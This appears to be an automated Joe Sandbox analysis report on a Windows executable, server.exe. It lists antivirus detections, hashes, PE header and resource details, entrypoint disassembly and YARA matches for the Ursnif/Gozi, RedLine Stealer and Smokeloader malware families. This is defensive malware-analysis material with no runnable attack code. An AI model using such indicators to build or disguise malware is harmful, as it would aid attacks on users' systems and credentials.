Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
server.exe	38%	ReversingLabs
server.exe	41%	Virustotal	Browse
server.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.server.exe.47e0000.2.unpack	100%	Avira	HEUR/AGEN.1245293		Download File
0.2.server.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7		Download File

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
checklist.skype.com	unknown	unknown	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	834121
Start date and time:	2023-03-24 14:00:16 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	server.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@1/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 52% (good quality ratio 50.5%) Quality average: 82.1% Quality standard deviation: 26.5%
HCA Information:	Successful, ratio: 98% Number of executed functions: 45 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.713055854715817
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	server.exe
File size:	251904
MD5:	62c6ed30422b5876110ee6ab6660223e
SHA1:	60e1a1c26d35c9d90fb163364e3a4deec1d4016a
SHA256:	fbb595a285f1126d4bfe09240e40b1a8a66ac5024f90b5e64860bb872e05a248
SHA512:	a5d124845b49428c7ffca0b81c063b81acdc84ef8d67511e9cb68489cd3baf1b3dd8420aff3b5972c4702da8fcad90c5fc3b7483bed1c03f9223475fc9760ec1
SSDEEP:	3072:VRESzcarU/edI7cTsSsuDwTHDXbtMJzWVCkeoQ0LTZ2eB25UWNObVr:eRNILMbJeW92eBoUj
TLSH:	54347C1273E1F960F52686328E1EC7FD6A3EB8E1DE55BF6E17449A3F0870261C662314
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S...<...D...<.7.]...<.......Z.:.V...S...&...<...R...<.3.R...<.4.R...RichS...................PE..L......b...........

File Icon


Icon Hash:	ba86124695b2aa92

Static PE Info

General

Entrypoint:	0x404135
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x62E0E386 [Wed Jul 27 07:04:38 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4fc712efe0d5d011b63626c597ebe2a6

Entrypoint Preview

Instruction
call 00007F770CC325D4h
jmp 00007F770CC2DA4Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00417008h+ecx*8]
je 00007F770CC2DBD5h
inc ecx
cmp ecx, 2Dh
jc 00007F770CC2DBB3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F770CC2DBD0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0041700Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F770CC2E864h
test eax, eax
jne 00007F770CC2DBC8h
mov eax, 00417170h
ret
add eax, 08h
ret
call 00007F770CC2E851h
test eax, eax
jne 00007F770CC2DBC8h
mov eax, 00417174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F770CC2DBA7h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F770CC2DB47h
pop ecx
mov esi, eax
call 00007F770CC2DB81h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F770CC2E816h
test eax, eax
jne 00007F770CC2DBC7h
push 0000000Ch
pop eax
pop ebp
ret
call 00007F770CC2DB64h
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
xor eax, eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi
jne 00007F770CC2DBCCh
call 00007F770CC2EDFAh

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x156a4	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2756000	0x15530	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x34f8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1dc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1517c	0x15200	False	0.5231139053254438	data	6.504969483391366	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x17000	0x273e58c	0x12c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2756000	0x15530	0x15600	False	0.37751279239766083	data	4.359745306091667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
BEKOJANIDURUPISO	0x2768888	0xd96	ASCII text, with very long lines (3478), with no line terminators	Sami Lappish	Finland
BEKOJANIDURUPISO	0x2768888	0xd96	ASCII text, with very long lines (3478), with no line terminators	Sami Lappish	Norway
BEKOJANIDURUPISO	0x2768888	0xd96	ASCII text, with very long lines (3478), with no line terminators	Sami Lappish	Sweden
RELOWAZUXOKU	0x2769620	0x598	ASCII text, with very long lines (1432), with no line terminators	Sami Lappish	Finland
RELOWAZUXOKU	0x2769620	0x598	ASCII text, with very long lines (1432), with no line terminators	Sami Lappish	Norway
RELOWAZUXOKU	0x2769620	0x598	ASCII text, with very long lines (1432), with no line terminators	Sami Lappish	Sweden
RT_ICON	0x2756830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0x2756830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0x2756830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0x27570d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0x27570d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0x27570d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0x27581a8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0x27581a8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0x27581a8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0x2758a50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0x2758a50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0x2758a50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0x275aff8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0x275aff8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0x275aff8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0x275c0d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Sami Lappish	Finland
RT_ICON	0x275c0d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Sami Lappish	Norway
RT_ICON	0x275c0d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Sami Lappish	Sweden
RT_ICON	0x275cf78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Sami Lappish	Finland
RT_ICON	0x275cf78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Sami Lappish	Norway
RT_ICON	0x275cf78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Sami Lappish	Sweden
RT_ICON	0x275d820	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Sami Lappish	Finland
RT_ICON	0x275d820	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Sami Lappish	Norway
RT_ICON	0x275d820	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Sami Lappish	Sweden
RT_ICON	0x275dee8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Sami Lappish	Finland
RT_ICON	0x275dee8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Sami Lappish	Norway
RT_ICON	0x275dee8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Sami Lappish	Sweden
RT_ICON	0x275e450	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Sami Lappish	Finland
RT_ICON	0x275e450	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Sami Lappish	Norway
RT_ICON	0x275e450	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Sami Lappish	Sweden
RT_ICON	0x27609f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Sami Lappish	Finland
RT_ICON	0x27609f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Sami Lappish	Norway
RT_ICON	0x27609f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Sami Lappish	Sweden
RT_ICON	0x2761aa0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Sami Lappish	Finland
RT_ICON	0x2761aa0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Sami Lappish	Norway
RT_ICON	0x2761aa0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Sami Lappish	Sweden
RT_ICON	0x2762428	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Sami Lappish	Finland
RT_ICON	0x2762428	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Sami Lappish	Norway
RT_ICON	0x2762428	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Sami Lappish	Sweden
RT_ICON	0x2762908	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0x2762908	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0x2762908	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0x27637b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0x27637b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0x27637b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0x2763e78	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0x2763e78	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0x2763e78	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0x27643e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0x27643e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0x27643e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0x2766988	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0x2766988	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0x2766988	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0x2767a30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0x2767a30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0x2767a30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0x27683b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0x27683b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0x27683b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Sami Lappish	Sweden
RT_STRING	0x2769ff0	0x4d6	data	Sami Lappish	Finland
RT_STRING	0x2769ff0	0x4d6	data	Sami Lappish	Norway
RT_STRING	0x2769ff0	0x4d6	data	Sami Lappish	Sweden
RT_STRING	0x276a4c8	0x4b0	data	Sami Lappish	Finland
RT_STRING	0x276a4c8	0x4b0	data	Sami Lappish	Norway
RT_STRING	0x276a4c8	0x4b0	data	Sami Lappish	Sweden
RT_STRING	0x276a978	0x588	data	Sami Lappish	Finland
RT_STRING	0x276a978	0x588	data	Sami Lappish	Norway
RT_STRING	0x276a978	0x588	data	Sami Lappish	Sweden
RT_STRING	0x276af00	0x5d2	data	Sami Lappish	Finland
RT_STRING	0x276af00	0x5d2	data	Sami Lappish	Norway
RT_STRING	0x276af00	0x5d2	data	Sami Lappish	Sweden
RT_STRING	0x276b4d8	0x58	data	Sami Lappish	Finland
RT_STRING	0x276b4d8	0x58	data	Sami Lappish	Norway
RT_STRING	0x276b4d8	0x58	data	Sami Lappish	Sweden
RT_ACCELERATOR	0x2769c60	0x78	data	Sami Lappish	Finland
RT_ACCELERATOR	0x2769c60	0x78	data	Sami Lappish	Norway
RT_ACCELERATOR	0x2769c60	0x78	data	Sami Lappish	Sweden
RT_ACCELERATOR	0x2769bb8	0xa8	data	Sami Lappish	Finland
RT_ACCELERATOR	0x2769bb8	0xa8	data	Sami Lappish	Norway
RT_ACCELERATOR	0x2769bb8	0xa8	data	Sami Lappish	Sweden
RT_GROUP_ICON	0x275c0a0	0x30	data	Sami Lappish	Finland
RT_GROUP_ICON	0x275c0a0	0x30	data	Sami Lappish	Norway
RT_GROUP_ICON	0x275c0a0	0x30	data	Sami Lappish	Sweden
RT_GROUP_ICON	0x2758180	0x22	data	Sami Lappish	Finland
RT_GROUP_ICON	0x2758180	0x22	data	Sami Lappish	Norway
RT_GROUP_ICON	0x2758180	0x22	data	Sami Lappish	Sweden
RT_GROUP_ICON	0x2762890	0x76	data	Sami Lappish	Finland
RT_GROUP_ICON	0x2762890	0x76	data	Sami Lappish	Norway
RT_GROUP_ICON	0x2762890	0x76	data	Sami Lappish	Sweden
RT_GROUP_ICON	0x2768820	0x68	data	Sami Lappish	Finland
RT_GROUP_ICON	0x2768820	0x68	data	Sami Lappish	Norway
RT_GROUP_ICON	0x2768820	0x68	data	Sami Lappish	Sweden
RT_VERSION	0x2769d18	0x2d4	data
None	0x2769cd8	0xa	data	Sami Lappish	Finland
None	0x2769cd8	0xa	data	Sami Lappish	Norway
None	0x2769cd8	0xa	data	Sami Lappish	Sweden
None	0x2769ce8	0xa	data	Sami Lappish	Finland
None	0x2769ce8	0xa	data	Sami Lappish	Norway
None	0x2769ce8	0xa	data	Sami Lappish	Sweden
None	0x2769cf8	0xa	data	Sami Lappish	Finland
None	0x2769cf8	0xa	data	Sami Lappish	Norway
None	0x2769cf8	0xa	data	Sami Lappish	Sweden
None	0x2769d08	0xa	data	Sami Lappish	Finland
None	0x2769d08	0xa	data	Sami Lappish	Norway
None	0x2769d08	0xa	data	Sami Lappish	Sweden

Imports

DLL

Import

KERNEL32.dll

SetDefaultCommConfigA, CreateMutexW, GetStringTypeA, GlobalCompact, _llseek, BuildCommDCBAndTimeoutsA, EnumCalendarInfoW, VerSetConditionMask, GetConsoleAliasA, GetCurrentActCtx, WriteConsoleInputA, SetEvent, GetModuleHandleW, EnumTimeFormatsW, InitializeCriticalSection, LoadLibraryW, GetFileAttributesA, TransactNamedPipe, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, SetCurrentDirectoryA, GetCPInfoExW, SetLastError, GetProcAddress, PeekConsoleInputW, GetFirmwareEnvironmentVariableW, SearchPathA, OpenWaitableTimerA, GetProcessId, LocalAlloc, SetCalendarInfoW, FindFirstVolumeMountPointW, GlobalGetAtomNameW, AddAtomA, WaitForMultipleObjects, EnumResourceTypesW, GetPrivateProfileSectionNamesA, FindNextFileA, FreeEnvironmentStringsW, GetWindowsDirectoryW, DeleteFileW, EnumCalendarInfoExA, CopyFileExA, SetStdHandle, WriteConsoleW, GetLastError, MoveFileA, WideCharToMultiByte, HeapAlloc, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, DecodePointer, TlsFree, GetCurrentThreadId, GetCurrentThread, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, HeapDestroy, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameA, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, MultiByteToWideChar, GetStringTypeW, FatalAppExitA, HeapFree, Sleep, IsProcessorFeaturePresent, GetLocaleInfoW, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, RtlUnwind, HeapReAlloc, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, CreateFileW

USER32.dll

LoadMenuW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Sami Lappish	Finland
Sami Lappish	Norway
Sami Lappish	Sweden

Network Behavior

Download Network PCAP: filtered – full

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2023 14:02:14.183909893 CET	58595	53	192.168.2.6	8.8.8.8
Mar 24, 2023 14:02:14.220094919 CET	53	58595	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2023 14:02:14.183909893 CET	192.168.2.6	8.8.8.8	0x81e3	Standard query (0)	checklist.skype.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 24, 2023 14:02:14.220094919 CET	8.8.8.8	192.168.2.6	0x81e3	Name error (3)	checklist.skype.com	none	none	A (IP address)	IN (0x0001)	false

Statistics

CPU Usage

• server.exe

Click to jump to process

Memory Usage

• server.exe

Click to jump to process

System Behavior

Analysis Process: server.exePID: 5276, Parent PID: 3452

Function Logs

General

Target ID:	0
Start time:	14:01:20
Start date:	24/03/2023
Path:	C:\Users\user\Desktop\server.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\server.exe
Imagebase:	0x400000
File size:	251904 bytes
MD5 hash:	62C6ED30422B5876110EE6AB6660223E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

File Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Value Queried

Show Windows behavior

COM Activities

WMI Operations

Show Windows behavior

Mutex Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Thread Activities

Thread Created

Thread APC Queued

Thread Delayed

Thread Information Set

Show Windows behavior

Memory Activities

Memory Allocated

Memory Protection Changed

Memory Usage Statistics

Show Windows behavior

System Activities

System Information Queried

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Network Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Object Security Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

LPC Port Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

Analysis Process: server.exePID: 5276, Parent PID: 3452COMMON

Executed Functions

Function 004019F1 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004019F1() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t30;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
